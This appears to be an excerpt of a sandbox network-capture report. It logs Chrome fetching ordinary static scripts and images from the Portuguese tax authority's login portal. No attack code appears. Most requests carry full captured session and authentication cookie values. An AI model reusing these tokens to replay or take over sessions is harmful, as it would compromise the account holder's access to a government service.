                                                                                                                  2024-11-14 13:59:54 UTC | 1525 | IN | Data Ascii: window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  14 | 192.168.2.4 | 49752 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 1176 | OUT | GET /autentica_static/img/background.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/autentica_static/css/styles.css?cb=5.2.10
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=80
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 300
                                                                                                                  Content-Length: 43457


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  15 | 192.168.2.4 | 49754 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 1178 | OUT | GET /autentica_static/img/logo-at.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC | 372 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=79
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 300
                                                                                                                  Content-Length: 8698


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  16 | 192.168.2.4 | 49753 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 1143 | OUT | GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 95790


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  17 | 192.168.2.4 | 49755 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 1145 | OUT | GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC | 401 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=14
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 21587


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  18 | 192.168.2.4 | 49757 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 1144 | OUT | GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 8308


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  19 | 192.168.2.4 | 49756 | 62.28.254.212 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 636 | OUT | GET /at/html//autentica_static/logos/logotipo_AT.png HTTP/1.1
                                                                                                                  Host: www.portaldasfinancas.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-11-14 13:59:55 UTC | 800 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 315
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Set-Cookie: AT_P=!uQTuTYfOdmp4l5iXNCYICHCNuUpMaeEZ4wzloG6HQNB+tifpD1BMCIL85dQ+gBTJbL0POc/AMS+tJuA=; path=/; Httponly; Secure; SameSite=strict
                                                                                                                  Set-Cookie: TS01bc69dc=01e43c52fe02e876414b488368fbd5750f7a8763a3f38f477fe50b2da2ba10c916a4e119ebde3f6846260fb1b396afeabd0dbfebaa; Path=/; Secure; HTTPOnly
                                                                                                                  Set-Cookie: TS7d2bcbce027=08def0a5edab200057f1248157f3b8841b251fc39b1b6e1bf75c4ec867a31b2f64e663decd9af72a089dd318321130009a4753c39781e5dd5506ed5fe4b51845d08cb401546f81e3bc806e4ebb2ab6d43164d63fc5daddfacf3ef06f9732c57e; Secure; Path=/
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  2024-11-14 13:59:55 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  20 | 192.168.2.4 | 49758 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 1130 | OUT | GET /autentica_static/js/smartresize.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC | 401 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=18
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 852
                                                                                                                  2024-11-14 13:59:55 UTC | 852 | IN | Data Ascii: (function($,sr){ // debouncing function from John Hann // http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/ var debounce = function (func, threshold, execAsap) { var timeout; return function d


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  21 | 192.168.2.4 | 49762 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 908 | OUT | GET /autentica_static/js/footer/footer.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab20008e094d6193eafe9765c8c62a006c8cd37867b35d7e58c2d7eccaaf1053610f890866179f65113000db1f249c366326fd9c1d48464b082592a78ba2a12dfbdc4ad19e31ad68bde2b2631e5f5094ee8ea6e8c5651de3180039
                                                                                                                  2024-11-14 13:59:55 UTC | 401 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=38
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 2
                                                                                                                  Content-Length: 3496
                                                                                                                  2024-11-14 13:59:55 UTC | 3496 | IN | Data Ascii: window.onload = function() { /** * Preencher footer com a info do RGPD */ var footerElem = document.getElementById("footer-rgpd-content"); if (window.PF && window.PF.common && window.PF.common.footer) { footerEl


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  22 | 192.168.2.4 | 49761 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 904 | OUT | GET /autentica_static/js/modernizr.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:55 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 2
                                                                                                                  Content-Length: 5418
                                                                                                                  2024-11-14 13:59:55 UTC | 5418 | IN | Data Ascii: /* Modernizr 2.8.3 (Custom Build) | MIT & BSD * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes */;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b)


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  23 | 192.168.2.4 | 49760 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 902 | OUT | GET /autentica_static/img/autenticacaogov.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:55 UTC | 372 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=65
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 300
                                                                                                                  Content-Length: 10264
                                                                                                                  2024-11-14 13:59:55 UTC | 10264 | IN | Data: PNG image data (binary content omitted)


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  24 | 192.168.2.4 | 49759 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 902 | OUT | GET /autentica_static/img/iconGovPt_20x20.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:55 UTC | 364 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 622
                                                                                                                  2024-11-14 13:59:55 UTC | 622 | IN | Data: PNG image data (binary content omitted)


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
